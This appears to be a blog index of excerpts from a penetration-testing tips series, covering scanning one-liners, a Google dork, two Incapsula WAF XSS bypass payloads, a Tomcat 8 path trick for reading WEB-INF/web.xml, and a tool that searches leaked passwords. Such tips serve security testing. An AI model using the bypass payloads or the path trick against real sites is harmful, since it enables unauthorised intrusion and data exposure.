Technique, Tool and Lecture #9

Technique: Basic one liner to clean masscan output
cat masscan-output | cut -d ' ' -f4,6
This will return something like this
Tool: Drozer - https://labs.f-secure.com/tools/drozer/
Awesome extensive attack framework for Android Apps (Must have)
Lecture: Not super technical but very interesting
Ochko123 - How the Feds Caught Russian Mega-Carder Roman Seleznev
https://www.youtube.com/watch?v=6Chp12sEnWk&t=784s
Check out …

Technique, Tool and Lecture #8

Technique: One line dash loop for running CLI tools on Kali
for IP in $(cat ~/Desktop/target); do nikto -host $IP >> ~/Desktop/nitko-output; done;
Tool: Nikto
Lecture: Drinking from the caffeine firehose we know as shodan
https://www.youtube.com/watch?v=5cWck_xcH64
Check out all the entries of this series! Technique Tool and Lecture #14 Technique Tool and Lecture …

Technique, Tool and Lecture #7

Technique: Google Dork for getting results consisting only of IP addresses. You have to include 2 octets but then can use * for the right. For example if I'm looking for data on 103.10.1.1/16 I can do site:103.10.* or site:103.10.*.* Remember * aren't wildcards but they are as close as you'll get. Also remember that …

Technique, Tool and Lecture #6

Hi Guys, Time for some more hacker's TLC. Or Tips and tricks for penetration testers! Anyway, here we go!
Technique: 2 Incapsula WAF XSS Bypasses
I haven't had a chance to use these yet but I do encounter Incapsula once in a while so I'll keep them in my bag
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
Source
Tool: …

Technique, Tool and Lecture #5

Technique: Quick and Easy Bypass for Tomcat 8 on Windows
https://x.x.x.x/WEB-INF/web.xml -> 403 Forbidden
https://x.x.x.x/./WEB-INF/web.xml -> 403 Forbidden
https://x.x.x.x/.//WEB-INF/web.xml -> 200 OK
Haven't had a chance to use this yet, but I'm sure I will soon
Source
Tool: Karma
So awesome! Lets you search by username, domain or password. For example I can search by …